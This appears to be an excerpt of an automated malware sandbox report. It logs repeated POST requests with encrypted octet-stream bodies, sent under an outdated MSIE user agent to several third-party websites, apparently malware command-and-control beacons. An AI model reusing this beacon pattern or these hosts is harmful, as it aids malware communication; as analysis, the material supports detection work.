ARYc1hm5BWUaB0O7KE/quLJUFMN3xH22XR0Na5rF4eKgRzTrwP2xcm4gPpil8LaLTBxiOsDZSrBizH/bDH3tNqp7leT3MbUYL2/KbO3Wqzz6zjMhzoWoyNrwrV/XRBHPoWlnTacHS0jjNUgAuT1tccY5XfW8kR94aZD44I6tN56sezLA0GJv1b9dLTem2a2dv44VUJErsDNlPtssKeojSGfS0NnXtQsUzldMK4rLz0e6TIaZ6Ot/xTSn74NIV3akbFco6w2u/xlIKB671Tuz3maGNzWUU5PqMUjDS3IMaDqmP2Noiy2k0n/b46e0jFtpQQal5Y8sssD7FXRluQ2+qb2YbKsp70dHpE+mACYcA4tKVHoJmfl+x/q/R0brqFmnhCdu+5i+3rDP72KnAOkdOG7b/n6FtcA/VRnZhyanot93Mk+cUIKaoAbW2S3OXIeQppn+FXPikk2k60IHa7vbkhWAhwn/zNAoSmLKzWJ/bN1/8NT4IjMVzL9bnxDUrwh1+78BHxJEAR6V2mVVCKn+CEawrwLp9M30D32424n31936qS1J5YZU5dmi2jYgE18CGyQJ38tj29o=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.vazir.seCache-Control: no-cacheData Raw: 6f 58 76 72 4e 37 78 46 2b 47 52 49 58 74 5a 4d 5a 32 55 76 47 45 2f 41 5a 55 31 55 6a 61 4b 76 73 4e 4a 68 64 50 73 6e 50 32 69 4c 75 2b 5a 4c 76 6f 6c 79 48 58 59 62 65 51 55 57 52 65 58 39 6c 77 45 39 42 61 58 36 6e 75 36 57 55 61 73 38 5a 4f 4b 50 52 32 51 75 77 33 50 58 62 2f 50 65 4a 54 2f 36 39 57 51 38 38 79 36 4c 36 32 4d 33 56 33 45 65 73 37 49 53 44 6d 4f 76 33 70 4f 4c 58 2f 46 59 61 56 4a 57 78 30 44 33 54 55 74 61 4c 67 79 6f 30 55 42 42 59 6e 31 4e 39 67 6a 59 62 34 78 52 4b 78 33 65 4f 78 64 41 4f 2b 49 6f 76 30 68 72 4f 37 6f 32 6a 42 59 65 4c 41 54 61 7a 4c 49 50 37 69 62 76 37 67 66 65 70 48 32 49 55 75 6c 45 45 6d 64 56 6f 69 72 6b 43 58 62 39 66 4f 56 46 47 4b 53 6e 64 31 69 6c 57 46 5a 47 44 2f 59 58 64 6d 78 52 4c 44 6b 71 6b 4f 42 4c 4f 66 64 53 4a 34 42 63 64 46 69 68 4e 2b 52 53 50 39 6d 61 37 48 42 33 56 6d 4d 4f 7a 49 6e 77 44 66 42 37 37 38 72 36 54 58 64 68 56 54 47 67 41 45 49 6b 47 4a 4d 59 78 5a 32 57 33 73 42 52 74 69 4b 56 79 61 6b 52 42 51 51 75 45 4c 32 4b 4c 6d 41 5a 34 4b 2b 2b 44 5a 37 71 44 4f 53 30 4f 49 69 4c 6a 67 46 50 6c 7a 51 72 44 43 58 4f 54 35 36 4a 6c 6c 52 32 59 64 51 6b 33 32 31 32 69 51 55 47 79 53 58 6c 48 62 43 34 37 57 4c 36 34 41 76 34 5a 63 7a 7a 69 52 66 4a 6a 2f 4d 70 38 48 64 71 75 6c 35 77 74 33 46 53 77 5a 50 33 65 76 41 54 5a 53 79 6a 33 4f 69 44 39 43 4a 67 48 44 7a 75 6a 51 53 37 55 35 64 78 48 38 61 50 36 34 45 59 72 56 65 78 53 53 68 69 49 58 64 39 38 45 36 31 45 34 68 4d 2b 49 70 4d 63 34 37 31 58 35 35 61 6f 41 67 52 51 52 52 54 58 4b 46 44 51 50 47 78 77 70 76 54 72 36 51 42 78 55 45 62 5a 5a 2f 54 44 78 76 66 42 36 4a 39 53 4d 74 6a 4e 66 6b 31 44 77 63 43 4a 6b 4f 69 33 65 57 52 4e 48 6c 6b 42 38 4f 79 47 62 31 57 2b 50 34 3d Data Ascii: oXvrN7xF+GRIXtZMZ2UvGE/AZU1UjaKvsNJhdPsnP2iLu+ZLvolyHXYbeQUWReX9lwE9BaX6nu6WUas8ZOKPR2Quw3PXb/PeJT/69WQ88y6L62M3V3Ees7ISDmOv3pOLX/FYaVJWx0D3TUtaLgyo0UBBYn1N9gjYb4xRKx3eOxdAO+Iov0hrO7o2jBYeLATazLIP7ibv7gfepH2IUulEEmdVoirkCXb9fOVFGKSnd1ilWFZGD/YXdmxRLDkqkOBLOfdSJ4BcdFihN+RSP9ma7HB3VmMOzInwDfB778r6TXdhVTGgAEIkGJMYxZ2W3sBRtiKVyakRBQQuEL2KLmAZ4K++DZ7qDOS0OIiLjgFPlzQrDCXOT56JllR2YdQk3212iQUGySXlHbC47WL64Av4ZczziRfJj/Mp8Hdqul5wt3FSwZP3evATZSyj3OiD9CJgHDzujQS7U5dxH8aP64EYrVexSShiIXd98E61E4hM+IpMc471X55aoAgRQRRTXKFDQPGxwpvTr6QBxUEbZZ/TDxvfB6J9SMtjNfk1DwcCJkOi3eWRNHlkB8OyGb1W+P4=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.credo.edu.plCache-Control: no-cacheData Raw: 41 52 59 63 31 68 6d 35 42 57 55 61 42 30 4f 37 4b 45 2f 71 75 4c 4a 55 46 4d 4e 33 78 48 32 32 58 52 30 4e 61 35 72 46 34 65 4b 67 52 7a 54 72 77 50 32 78 63 6d 34 67 50 70 69 6c 38 4c 61 4c 54 42 78 69 4f 73 44 5a 53 72 42 69 7a 48 2f 62 44 48 33 74 4e 71 70 37 6c 65 54 33 4d 62 55 59 4c 32 2f 4b 62 4f 33 57 71 7a 7a 36 7a 6a 4d 68 7a 6f 57 6f 79 4e 72 77 72 56 2f 58 52 42 48 50 6f 57 6c 6e 54 61 63 48 53 30 6a 6a 4e 55 67 41 75 54 31 74 63 63 59 35 58 66 57 38 6b 52 39 34 61 5a 44 34 34 49 36 74 4e 35 36 73 65 7a 4c 41 30 47 4a 76 31 62 39 64 4c 54 65 6d 32 61 32 64 76 34 34 56 55 4a 45 72 73 44 4e 6c 50 74 73 73 4b 65 6f 6a 53 47 66 53 30 4e 6e 58 74 51 73 55 7a 6c 64 4d 4b 34 72 4c 7a 30 65 36 54 49 61 5a 36 4f 74 2f 78 54 53 6e 37 34 4e 49 56 33 61 6b 62 46 63 6f 36 77 32 75 2f 78 6c 49 4b 42 36 37 31 54 75 7a 33 6d 61 47 4e 7a 57 55 55 35 50 71 4d 55 6a 44 53 33 49 4d 61 44 71 6d 50 32 4e 6f 69 79 32 6b 30 6e 2f 62 34 36 65 30 6a 46 74 70 51 51 61 6c 35 59 38 73 73 73 44 37 46 58 52 6c 75 51 32 2b 71 62 32 59 62 4b 73 70 37 30 64 48 70 45 2b 6d 41 43 59 63 41 34 74 4b 56 48 6f 4a 6d 66 6c 2b 78 2f 71 2f 52 30 62 72 71 46 6d 6e 68 43 64 75 2b 35 69 2b 33 72 44 50 37 32 4b 6e 41 4f 6b 64 4f 47 37 62 2f 6e 36 46 74 63 41 2f 56 52 6e 5a 68 79 61 6e 6f 74 39 33 4d 6b 2b 63 55 49 4b 61 6f 41 62 57 32 53 33 4f 58 49 65 51 70 70 6e 2b 46 58 50 69 6b 6b 32 6b 36 30 49 48 61 37 76 62 6b 68 57 41 68 77 6e 2f 7a 4e 41 6f 53 6d 4c 4b 7a 57 4a 2f 62 4e 31 2f 38 4e 54 34 49 6a 4d 56 7a 4c 39 62 6e 78 44 55 72 77 68 31 2b 37 38 42 48 78 4a 45 41 52 36 56 32 6d 56 56 43 4b 6e 2b 43 45 61 77 72 77 4c 70 39 4d 33 30 44 33 32 34 32 34 6e 33 31 39 33 36 71 53 31 4a 35 59 5a 55 35 64 6d 69 32 6a 59 67 45 31 38 43 47 79 51 4a 33 38 74 6a 32 39 6f 3d Data Ascii: ARYc1hm5BWUaB0O7KE/quLJUFMN3xH22XR0Na5rF4eKgRzTrwP2xcm4gPpil8LaLTBxiOsDZSrBizH/bDH3tNqp7leT3MbUYL2/KbO3Wqzz6zjMhzoWoyNrwrV/XRBHPoWlnTacHS0jjNUgAuT1tccY5XfW8kR94aZD44I6tN56sezLA0GJv1b9dLTem2a2dv44VUJErsDNlPtssKeojSGfS0NnXtQsUzldMK4rLz0e6TIaZ6Ot/xTSn74NIV3akbFco6w2u/xlIKB671Tuz3maGNzWUU5PqMUjDS3IMaDqmP2Noiy2k0n/b46e0jFtpQQal5Y8sssD7FXRluQ2+qb2YbKsp70dHpE+mACYcA4tKVHoJmfl+x/q/R0brqFmnhCdu+5i+3rDP72KnAOkdOG7b/n6FtcA/VRnZhyanot93Mk+cUIKaoAbW2S3OXIeQppn+FXPikk2k60IHa7vbkhWAhwn/zNAoSmLKzWJ/bN1/8NT4IjMVzL9bnxDUrwh1+78BHxJEAR6V2mVVCKn+CEawrwLp9M30D32424n31936qS1J5YZU5dmi2jYgE18CGyQJ38tj29o=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nunomira.comCache-Control: no-cacheData Raw: 4e 49 33 63 67 31 49 4e 41 32 58 54 46 6e 6b 6c 42 55 7a 6e 34 56 56 75 44 56 65 69 67 33 71 56 70 6e 68 36 30 50 41 49 4a 67 48 37 4f 74 77 75 37 48 75 50 62 58 51 74 76 30 34 6f 41 67 53 33 49 4e 73 4b 59 33 43 4c 48 74 74 48 32 76 35 71 2f 63 59 66 46 62 50 56 61 2b 4f 74 74 47 7a 57 41 6e 68 31 67 6a 48 43 58 50 74 62 36 46 4f 76 42 47 73 6f 67 72 7a 36 53 47 63 45 30 72 73 62 30 42 73 77 4e 38 5a 34 41 71 78 4a 4c 42 61 52 36 49 43 49 6d 65 4c 39 65 62 62 64 50 39 61 4f 5a 67 45 50 72 37 2f 57 39 4f 5a 58 50 4a 72 2f 41 58 32 44 77 42 4d 57 53 49 77 42 6a 74 51 72 4c 36 32 42 36 76 4e 4e 44 4c 44 41 57 58 42 65 5a 63 4c 39 4d 71 2b 34 58 39 6c 66 63 39 71 43 61 37 66 43 6a 52 34 4d 4e 31 73 4f 58 63 45 53 42 41 47 37 71 70 38 4c 48 79 6b 4e 4e 47 33 41 49 34 77 36 55 48 44 47 2f 45 56 55 61 36 55 51 32 4e 4e 6f 52 74 50 32 45 78 33 53 70 6c 32 5a 2f 46 4c 4c 6b 76 4f 59 4c 36 73 75 35 74 4a 7a 6a 58 77 38 38 55 72 46 35 6a 73 4c 64 39 70 6d 64 4f 42 71 35 41 2b 7a 79 46 58 47 2f 67 73 51 53 2f 39 33 7a 63 50 71 58 77 57 43 58 39 65 36 44 46 54 59 73 4b 77 4f 5a 51 6c 39 41 30 6b 73 39 70 75 4f 50 4a 37 54 6a 52 6b 45 6c 6d 50 4d 49 43 4b 6a 34 79 55 62 35 6f 71 6e 79 7a 6d 6d 64 35 34 35 47 61 36 35 56 49 49 45 72 50 61 4c 68 6f 48 62 73 64 36 4f 66 6b 55 6b 43 57 33 43 34 63 6c 74 33 79 63 34 6f 4a 2f 67 76 71 4b 4f 30 30 39 36 52 68 51 4a 78 71 68 48 4c 35 36 41 65 72 42 33 77 66 76 4e 4b 63 64 2b 5a 54 61 35 37 48 41 63 62 77 58 4b 6d 71 4c 65 50 44 6a 34 58 42 45 4a 47 46 73 48 73 32 67 73 53 42 6d 30 48 56 43 36 59 66 37 47 34 72 76 6d 41 55 70 63 48 55 6c 34 6b 76 77 51 46 72 70 6b Data Ascii: NI3cg1INA2XTFnklBUzn4VVuDVeig3qVpnh60PAIJgH7Otwu7HuPbXQtv04oAgS3INsKY3CLHttH2v5q/cYfFbPVa+OttGzWAnh1gjHCXPtb6FOvBGsogrz6SGcE0rsb0BswN8Z4AqxJLBaR6ICImeL9ebbdP9aOZgEPr7/W9OZXPJr/AX2DwBMWSIwBjtQrL62B6vNNDLDAWXBeZcL9Mq+4X9lfc9qCa7fCjR4MN1sOXcESBAG7qp8LHykNNG3AI4w6UHDG/EVUa6UQ2NNoRtP2Ex3Spl2Z/FLLkvOYL6su5tJzjXw88UrF5jsLd9pmdOBq5A+zyFXG/gsQS/93zcPqXwWCX9e6DFTYsKwOZQl9A0ks9puOPJ7TjRkElmPMICKj4yUb5oqnyzmmd545Ga65VIIErPaLhoHbsd6OfkUkCW3C4clt3yc4oJ/gvqKO0096RhQJxqhHL56AerB3wfvNKcd+ZTa57HAcbwXKmqLePDj4XBEJGFsHs2gsSBm0HVC6Yf7G4rvmAUpcHUl4kvwQFrpk
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nelipak.nlCache-Control: no-cacheData Raw: 53 35 66 2b 70 2f 53 4a 44 47 55 46 59 76 79 33 54 79 7a 64 31 55 66 70 69 70 66 73 6f 52 42 43 61 41 62 69 2f 30 2b 50 58 43 2f 4a 35 78 51 77 58 33 6d 46 65 32 52 72 64 6e 4d 63 39 5a 38 66 58 54 78 6e 41 6d 36 6c 74 50 79 66 76 34 5a 6d 4f 70 74 6d 79 6f 48 61 5a 39 75 76 46 4e 53 66 53 69 79 35 32 4f 6b 72 76 43 4d 2f 65 41 62 59 6c 77 73 33 34 47 6f 6b 4f 6e 71 46 6a 69 6c 30 43 65 37 43 53 39 4d 6b 77 46 44 54 32 36 39 2f 54 50 6d 6b 69 30 61 76 69 53 63 67 49 63 48 67 6e 5a 49 50 79 35 6d 43 43 32 49 73 62 42 56 63 68 37 70 48 7a 53 52 56 68 65 37 4b 45 77 37 46 31 36 57 4c 6e 67 59 64 6d 6f 77 74 77 56 45 65 6e 35 79 54 68 74 72 32 6f 59 70 47 69 47 67 67 6a 62 52 44 37 62 37 38 57 58 4d 61 7a 33 52 62 70 49 64 6f 48 48 62 47 44 41 54 78 74 55 58 35 55 69 68 31 6b 58 6c 43 35 6e 7a 67 67 68 56 2b 2f 4d 7a 46 74 46 47 4c 34 66 38 58 5a 6b 44 4b 33 6a 4b 53 75 4b 61 5a 66 54 30 53 4b 38 47 6e 39 6d 68 48 72 4b 74 47 68 66 48 56 50 31 66 75 4e 35 45 45 36 75 50 53 65 54 46 32 55 56 47 57 6a 51 36 42 65 44 56 31 67 72 6f 46 48 4d 56 54 56 35 33 38 4e 77 54 47 48 6f 79 4c 59 77 38 69 65 56 6c 36 51 41 68 78 4d 73 56 45 75 43 56 51 53 5a 45 52 6a 67 2f 42 37 76 4b 65 34 6e 5a 6a 50 71 30 31 6e 37 67 41 7a 72 61 6b 66 6d 72 64 33 47 58 6a 57 4f 4f 39 55 6d 30 57 59 54 57 4e 33 33 52 74 70 6a 34 32 42 41 54 59 73 69 65 74 52 58 46 51 42 62 4f 58 36 4d 39 36 6e 4e 49 56 34 33 4f 64 37 32 52 57 2f 36 44 33 34 6b 79 54 62 2b 51 4c 66 45 31 62 30 38 49 58 61 32 47 6c 44 37 34 75 77 54 42 33 4f 47 38 48 62 76 56 77 41 55 64 61 62 44 74 45 6b 6f 51 63 39 71 6f 6f 4d 2b 2b 5a 69 36 50 51 6c 55 44 61 76 78 2f 4a 4d 57 6a 51 33 41 5a 38 32 2b 30 39 33 31 6c 77 59 75 57 31 72 51 2f 64 2b 73 51 6b 68 55 38 43 53 68 49 3d Data Ascii: S5f+p/SJDGUFYvy3Tyzd1UfpipfsoRBCaAbi/0+PXC/J5xQwX3mFe2RrdnMc9Z8fXTxnAm6ltPyfv4ZmOptmyoHaZ9uvFNSfSiy52OkrvCM/eAbYlws34GokOnqFjil0Ce7CS9MkwFDT269/TPmki0aviScgIcHgnZIPy5mCC2IsbBVch7pHzSRVhe7KEw7F16WLngYdmowtwVEen5yThtr2oYpGiGggjbRD7b78WXMaz3RbpIdoHHbGDATxtUX5Uih1kXlC5nzgghV+/MzFtFGL4f8XZkDK3jKSuKaZfT0SK8Gn9mhHrKtGhfHVP1fuN5EE6uPSeTF2UVGWjQ6BeDV1groFHMVTV538NwTGHoyLYw8ieVl6QAhxMsVEuCVQSZERjg/B7vKe4nZjPq01n7gAzrakfmrd3GXjWOO9Um0WYTWN33Rtpj42BATYsietRXFQBbOX6M96nNIV43Od72RW/6D34kyTb+QLfE1b08IXa2GlD74uwTB3OG8HbvVwAUdabDtEkoQc9qooM++Zi6PQlUDavx/JMWjQ3AZ82+0931lwYuW1rQ/d+sQkhU8CShI=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nelipak.nlCache-Control: no-cacheData Raw: 53 35 66 2b 70 2f 53 4a 44 47 55 46 59 76 79 33 54 79 7a 64 31 55 66 70 69 70 66 73 6f 52 42 43 61 41 62 69 2f 30 2b 50 58 43 2f 4a 35 78 51 77 58 33 6d 46 65 32 52 72 64 6e 4d 63 39 5a 38 66 58 54 78 6e 41 6d 36 6c 74 50 79 66 76 34 5a 6d 4f 70 74 6d 79 6f 48 61 5a 39 75 76 46 4e 53 66 53 69 79 35 32 4f 6b 72 76 43 4d 2f 65 41 62 59 6c 77 73 33 34 47 6f 6b 4f 6e 71 46 6a 69 6c 30 43 65 37 43 53 39 4d 6b 77 46 44 54 32 36 39 2f 54 50 6d 6b 69 30 61 76 69 53 63 67 49 63 48 67 6e 5a 49 50 79 35 6d 43 43 32 49 73 62 42 56 63 68 37 70 48 7a 53 52 56 68 65 37 4b 45 77 37 46 31 36 57 4c 6e 67 59 64 6d 6f 77 74 77 56 45 65 6e 35 79 54 68 74 72 32 6f 59 70 47 69 47 67 67 6a 62 52 44 37 62 37 38 57 58 4d 61 7a 33 52 62 70 49 64 6f 48 48 62 47 44 41 54 78 74 55 58 35 55 69 68 31 6b 58 6c 43 35 6e 7a 67 67 68 56 2b 2f 4d 7a 46 74 46 47 4c 34 66 38 58 5a 6b 44 4b 33 6a 4b 53 75 4b 61 5a 66 54 30 53 4b 38 47 6e 39 6d 68 48 72 4b 74 47 68 66 48 56 50 31 66 75 4e 35 45 45 36 75 50 53 65 54 46 32 55 56 47 57 6a 51 36 42 65 44 56 31 67 72 6f 46 48 4d 56 54 56 35 33 38 4e 77 54 47 48 6f 79 4c 59 77 38 69 65 56 6c 36 51 41 68 78 4d 73 56 45 75 43 56 51 53 5a 45 52 6a 67 2f 42 37 76 4b 65 34 6e 5a 6a 50 71 30 31 6e 37 67 41 7a 72 61 6b 66 6d 72 64 33 47 58 6a 57 4f 4f 39 55 6d 30 57 59 54 57 4e 33 33 52 74 70 6a 34 32 42 41 54 59 73 69 65 74 52 58 46 51 42 62 4f 58 36 4d 39 36 6e 4e 49 56 34 33 4f 64 37 32 52 57 2f 36 44 33 34 6b 79 54 62 2b 51 4c 66 45 31 62 30 38 49 58 61 32 47 6c 44 37 34 75 77 54 42 33 4f 47 38 48 62 76 56 77 41 55 64 61 62 44 74 45 6b 6f 51 63 39 71 6f 6f 4d 2b 2b 5a 69 36 50 51 6c 55 44 61 76 78 2f 4a 4d 57 6a 51 33 41 5a 38 32 2b 30 39 33 31 6c 77 59 75 57 31 72 51 2f 64 2b 73 51 6b 68 55 38 43 53 68 49 3d Data Ascii: S5f+p/SJDGUFYvy3Tyzd1UfpipfsoRBCaAbi/0+PXC/J5xQwX3mFe2RrdnMc9Z8fXTxnAm6ltPyfv4ZmOptmyoHaZ9uvFNSfSiy52OkrvCM/eAbYlws34GokOnqFjil0Ce7CS9MkwFDT269/TPmki0aviScgIcHgnZIPy5mCC2IsbBVch7pHzSRVhe7KEw7F16WLngYdmowtwVEen5yThtr2oYpGiGggjbRD7b78WXMaz3RbpIdoHHbGDATxtUX5Uih1kXlC5nzgghV+/MzFtFGL4f8XZkDK3jKSuKaZfT0SK8Gn9mhHrKtGhfHVP1fuN5EE6uPSeTF2UVGWjQ6BeDV1groFHMVTV538NwTGHoyLYw8ieVl6QAhxMsVEuCVQSZERjg/B7vKe4nZjPq01n7gAzrakfmrd3GXjWOO9Um0WYTWN33Rtpj42BATYsietRXFQBbOX6M96nNIV43Od72RW/6D34kyTb+QLfE1b08IXa2GlD74uwTB3OG8HbvVwAUdabDtEkoQc9qooM++Zi6PQlUDavx/JMWjQ3AZ82+0931lwYuW1rQ/d+sQkhU8CShI=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nunomira.comCache-Control: no-cacheData Raw: 4e 49 33 63 67 31 49 4e 41 32 58 54 46 6e 6b 6c 42 55 7a 6e 34 56 56 75 44 56 65 69 67 33 71 56 70 6e 68 36 30 50 41 49 4a 67 48 37 4f 74 77 75 37 48 75 50 62 58 51 74 76 30 34 6f 41 67 53 33 49 4e 73 4b 59 33 43 4c 48 74 74 48 32 76 35 71 2f 63 59 66 46 62 50 56 61 2b 4f 74 74 47 7a 57 41 6e 68 31 67 6a 48 43 58 50 74 62 36 46 4f 76 42 47 73 6f 67 72 7a 36 53 47 63 45 30 72 73 62 30 42 73 77 4e 38 5a 34 41 71 78 4a 4c 42 61 52 36 49 43 49 6d 65 4c 39 65 62 62 64 50 39 61 4f 5a 67 45 50 72 37 2f 57 39 4f 5a 58 50 4a 72 2f 41 58 32 44 77 42 4d 57 53 49 77 42 6a 74 51 72 4c 36 32 42 36 76 4e 4e 44 4c 44 41 57 58 42 65 5a 63 4c 39 4d 71 2b 34 58 39 6c 66 63 39 71 43 61 37 66 43 6a 52 34 4d 4e 31 73 4f 58 63 45 53 42 41 47 37 71 70 38 4c 48 79 6b 4e 4e 47 33 41 49 34 77 36 55 48 44 47 2f 45 56 55 61 36 55 51 32 4e 4e 6f 52 74 50 32 45 78 33 53 70 6c 32 5a 2f 46 4c 4c 6b 76 4f 59 4c 36 73 75 35 74 4a 7a 6a 58 77 38 38 55 72 46 35 6a 73 4c 64 39 70 6d 64 4f 42 71 35 41 2b 7a 79 46 58 47 2f 67 73 51 53 2f 39 33 7a 63 50 71 58 77 57 43 58 39 65 36 44 46 54 59 73 4b 77 4f 5a 51 6c 39 41 30 6b 73 39 70 75 4f 50 4a 37 54 6a 52 6b 45 6c 6d 50 4d 49 43 4b 6a 34 79 55 62 35 6f 71 6e 79 7a 6d 6d 64 35 34 35 47 61 36 35 56 49 49 45 72 50 61 4c 68 6f 48 62 73 64 36 4f 66 6b 55 6b 43 57 33 43 34 63 6c 74 33 79 63 34 6f 4a 2f 67 76 71 4b 4f 30 30 39 36 52 68 51 4a 78 71 68 48 4c 35 36 41 65 72 42 33 77 66 76 4e 4b 63 64 2b 5a 54 61 35 37 48 41 63 62 77 58 4b 6d 71 4c 65 50 44 6a 34 58 42 45 4a 47 46 73 48 73 32 67 73 53 42 6d 30 48 56 43 36 59 66 37 47 34 72 76 6d 41 55 70 63 48 55 6c 34 6b 76 77 51 46 72 70 6b Data Ascii: NI3cg1INA2XTFnklBUzn4VVuDVeig3qVpnh60PAIJgH7Otwu7HuPbXQtv04oAgS3INsKY3CLHttH2v5q/cYfFbPVa+OttGzWAnh1gjHCXPtb6FOvBGsogrz6SGcE0rsb0BswN8Z4AqxJLBaR6ICImeL9ebbdP9aOZgEPr7/W9OZXPJr/AX2DwBMWSIwBjtQrL62B6vNNDLDAWXBeZcL9Mq+4X9lfc9qCa7fCjR4MN1sOXcESBAG7qp8LHykNNG3AI4w6UHDG/EVUa6UQ2NNoRtP2Ex3Spl2Z/FLLkvOYL6su5tJzjXw88UrF5jsLd9pmdOBq5A+zyFXG/gsQS/93zcPqXwWCX9e6DFTYsKwOZQl9A0ks9puOPJ7TjRkElmPMICKj4yUb5oqnyzmmd545Ga65VIIErPaLhoHbsd6OfkUkCW3C4clt3yc4oJ/gvqKO0096RhQJxqhHL56AerB3wfvNKcd+ZTa57HAcbwXKmqLePDj4XBEJGFsHs2gsSBm0HVC6Yf7G4rvmAUpcHUl4kvwQFrpk
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.petsfan.comCache-Control: no-cacheData Raw: 61 68 6d 79 56 48 44 56 43 57 57 30 33 35 6c 46 67 32 72 70 49 43 4e 53 41 6b 51 59 2b 63 78 76 70 4f 4d 54 6c 38 33 5a 43 5a 6b 64 70 68 4f 50 33 48 4c 2b 33 6e 6a 46 58 31 44 44 5a 61 65 59 49 4f 64 76 54 73 32 6d 57 71 46 4b 4a 69 4c 4a 35 62 61 54 64 4b 47 41 38 52 31 4b 77 70 38 45 43 32 67 42 44 58 7a 70 62 37 4c 42 68 69 30 31 62 62 66 35 77 48 52 69 64 49 6d 61 41 37 38 2b 6b 6f 50 36 61 68 46 6d 49 57 36 6a 6d 77 4f 6b 2f 71 70 66 30 58 59 53 68 54 6c 56 59 4c 54 65 45 75 53 49 4b 30 79 53 75 5a 58 4c 50 5a 52 53 64 42 61 6c 42 45 6b 54 6b 72 6c 65 66 79 2b 47 53 75 49 55 47 4d 41 70 4a 75 48 4d 32 65 76 6e 57 51 31 35 62 54 6e 50 4c 65 52 49 68 70 45 70 65 35 35 65 6d 42 63 68 4f 53 54 4d 52 74 70 4c 4a 74 75 53 4f 53 30 58 4c 57 37 69 6e 77 47 52 54 67 51 74 74 6c 31 30 51 30 6e 42 54 34 42 47 6c 35 31 75 70 4e 78 78 59 7a 47 78 72 2f 45 61 4b 39 2b 49 5a 57 78 37 64 59 57 6d 4f 30 52 4d 70 32 43 46 4e 4b 32 65 4b 4f 33 52 6a 6d 42 50 46 74 4c 2f 4f 31 30 6e 73 78 4b 4c 41 4f 41 69 6e 6e 74 57 6e 63 39 46 38 38 6a 34 4f 62 78 76 51 34 41 53 4b 7a 7a 73 58 45 55 78 2b 45 2f 36 64 39 33 6e 6c 2f 4c 6e 67 4d 63 42 4d 50 6f 2b 49 52 52 46 6d 48 37 55 30 76 74 76 39 47 2f 76 74 78 4c 57 6d 6b 5a 46 64 75 67 75 6d 54 35 54 5a 63 73 6a 57 66 39 37 56 30 68 4b 38 7a 57 63 47 4a 4a 74 44 35 4b 6d 65 72 61 2f 52 79 50 64 41 55 32 63 66 36 63 62 36 56 32 43 49 67 71 35 32 31 75 5a 62 68 6f 79 61 39 71 55 43 58 4c 33 66 64 4f 35 73 30 4c 4a 62 47 4f 48 4d 4a 46 46 41 6b 2b 6a 31 2b 5a 52 6d 4a 41 48 49 6b 77 70 4b 71 62 32 35 59 71 4b 34 53 5a 35 32 63 72 38 46 39 4e 68 35 4a 46 6a 56 58 67 49 4f 55 62 70 57 49 6e 54 32 7a 5a 65 59 66 6b 66 6e 72 41 6c 45 5a 45 3d Data Ascii: ahmyVHDVCWW035lFg2rpICNSAkQY+cxvpOMTl83ZCZkdphOP3HL+3njFX1DDZaeYIOdvTs2mWqFKJiLJ5baTdKGA8R1Kwp8EC2gBDXzpb7LBhi01bbf5wHRidImaA78+koP6ahFmIW6jmwOk/qpf0XYShTlVYLTeEuSIK0ySuZXLPZRSdBalBEkTkrlefy+GSuIUGMApJuHM2evnWQ15bTnPLeRIhpEpe55emBchOSTMRtpLJtuSOS0XLW7inwGRTgQttl10Q0nBT4BGl51upNxxYzGxr/EaK9+IZWx7dYWmO0RMp2CFNK2eKO3RjmBPFtL/O10nsxKLAOAinntWnc9F88j4ObxvQ4ASKzzsXEUx+E/6d93nl/LngMcBMPo+IRRFmH7U0vtv9G/vtxLWmkZFdugumT5TZcsjWf97V0hK8zWcGJJtD5Kmera/RyPdAU2cf6cb6V2CIgq521uZbhoya9qUCXL3fdO5s0LJbGOHMJFFAk+j1+ZRmJAHIkwpKqb25YqK4SZ52cr8F9Nh5JFjVXgIOUbpWInT2zZeYfkfnrAlEZE=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.otena.comCache-Control: no-cacheData Raw: 62 64 78 4d 4a 46 61 54 45 47 56 68 61 39 78 66 4d 62 4a 67 58 50 6c 57 42 4f 6e 32 65 37 6f 58 36 73 54 31 68 38 62 59 65 4b 7a 64 49 76 73 76 57 4e 48 4d 79 65 54 37 50 38 74 7a 38 6e 55 75 4b 75 6c 74 65 76 47 4d 78 6c 32 77 6d 32 72 57 53 51 70 62 61 30 6a 57 41 47 49 6f 78 41 44 45 42 66 68 2b 5a 67 2b 79 4f 6f 32 33 63 7a 6e 69 6c 39 30 62 35 63 54 51 49 51 44 4c 55 67 72 76 2b 76 51 76 4d 4d 4d 46 49 76 74 4b 67 46 43 66 73 52 55 70 73 43 5a 4c 73 6c 7a 53 72 65 33 53 31 77 73 2f 51 6c 76 4c 6d 48 51 76 42 66 73 54 62 64 72 4b 49 46 62 5a 65 38 47 4a 5a 6a 31 4c 74 4b 61 35 43 65 63 6d 6c 4a 71 6b 65 71 45 6b 42 65 53 59 4d 39 45 4a 7a 48 30 7a 30 72 44 6a 42 78 4b 36 39 6e 6d 52 59 76 78 39 4b 78 6f 71 43 70 53 51 4f 56 45 58 33 63 73 66 6f 70 66 4e 4b 52 54 35 43 2f 41 65 6b 4e 42 47 37 58 42 55 71 58 52 4f 